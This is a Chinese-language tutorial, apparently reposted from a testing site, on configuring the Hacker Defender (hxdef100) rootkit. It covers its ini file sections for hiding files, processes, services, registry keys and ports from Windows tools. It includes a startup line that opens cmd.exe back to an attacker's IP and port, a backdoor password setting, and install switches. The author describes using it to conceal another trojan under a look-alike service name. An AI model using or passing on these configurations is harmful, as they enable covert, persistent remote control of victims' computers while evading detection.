超级后门Hxdef100的配置和使用方法

　　 下载来的Hxdef100具有以下文件

1. bdcli100.exe    自带后门客户端连接文件

2. hxdef100.exe    Hxdef100后门主程序

3. hxdef100.2.ini  配置文件模板

4. hxdef100.ini    经过简单加密的配置文件模板

打开hxdef.2.ini ，我们可以看到它的默认配置选项，首先，我们先对[Hidden Table]项进行配置，

[Hidden Table]是要隐藏的列表，写在这个目录下的字符串，不管是作为文件名还是目录名，

都将不在Windows的任务管理器、资源管理器中出现，并且支持通配符，一行一个。

例如：

[Hidden Table]

hxdef*            /*隐藏所有以hxdef开头的文件名、目录名等

rcmd.exe          /*隐藏rcmd.exe文件

-----------------------------------------

下一步，就是

[Root Processes]这里是配置要隐藏能在进程管理器中显示的进程名，同样支持通配符。

例如：

[Root Processes]

hxdef*            /*隐藏所有以hxdef开头的所有进程

rcmd.exe          /*隐藏rcmd.exe文件进程

------------------------------------------

[Hidden Services]项目，是所要隐藏的服务列表，hxdef非但可以隐藏自身，而且还可以为其他后门、程序提供隐藏服务。

首先当然是隐藏自身了，而后是其他的服务，支持通配符，一行一个。

例如：

[Hidden Services]  

Hackerdefender*   /*这个是你的hxdef的服务名

SVCH0ST           /*这个是我的网络神偷免杀版的服务名，那个o其实是数字0

----------------------------------------------

[Hidden RegKeys]隐藏RegKeys列表，我们天家的服务都是在Hkey_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\Services

找到对应的注册表项，所以为了做到彻底隐藏，我们就要将隐藏进行到底，

例如：

[Hidden RegKeys]

Hackerdefender100  /*默认服务名

LEGACY_Hackerdefender100   /*LEGACY加hxdef的服务名

HackerdefenderDrv100       /*hxdef的默认驱动名

LEGACY_HackerdefenderDrv100   /*LEGACY加HackerdefenderDrv100的服务名

其他的服务也如此添加，不同服务应该对应自身的服务名。

---------------------------------------------

[Startup Run]

c -e %windir%\system\cmd.exe 你的ip 端口

这里允许使用诸如%windir%   %tmpdir% 等环境变量。

--------------------------------------------

[Hidden Ports]

TCP:2004,8922,9333    /*要隐藏的TCP协议端口

UDP:2004,8922,9333    /*要隐藏的UDP协议端口

---------------------------------------------

[Settings] hxdef 的设置部分，可以设置hxdef的服务名，描述，显示名等。设置方法如下：

[Settings]

Password=eyas.126.com                         /*后门连接密码

BackdoorShell=stdio?.exe                      /*后门连接后，会将cmd.exe复制一份，每个连接复制一份，？为通配符。连接完毕后，自动删除。

FileMappingName=_.-=[Hacker Defender]=-._

ServiceName=HackerDefender100                 /*hxdef的服务名，要和上面的[Hidden Services]项对应！

ServiceDisplayName=HXD Service 100            /*hxdef的服务显示名

ServiceDescription=powerfui NT rookit         /*hxdef的服务描述

DriverName=HackerDefenderDrv100               /*hxdef驱动名

DriverFileName=hxdefdrv.sys                   /*hxdef驱动文件名

-------------------------------------------

[Comments]为注释部分，由于hxdef100的配置文件为.ini，所以一定要把[Hidden Table]项目填写正确完全，

尤其把这个.ini文件也要隐藏掉，不然你就等着郁闷吧！

----------------------------------------------

以上我们知道了hxdef的配制方法，在种后门的时候，还需要注意以下的几个开关选项及事项：

-：installonly             /*仅仅进行安装服务，并不同步运行

-：refresh                 /*重新读取ini设置

-：noservice               /*正常运行，但是不安装服务，重新启动的时候恢复， 做测试的时候用

-：uninstall               /*将hxdef移出内存，并且断开所有连接和卸载服务

原文转自：http://www.ltesting.net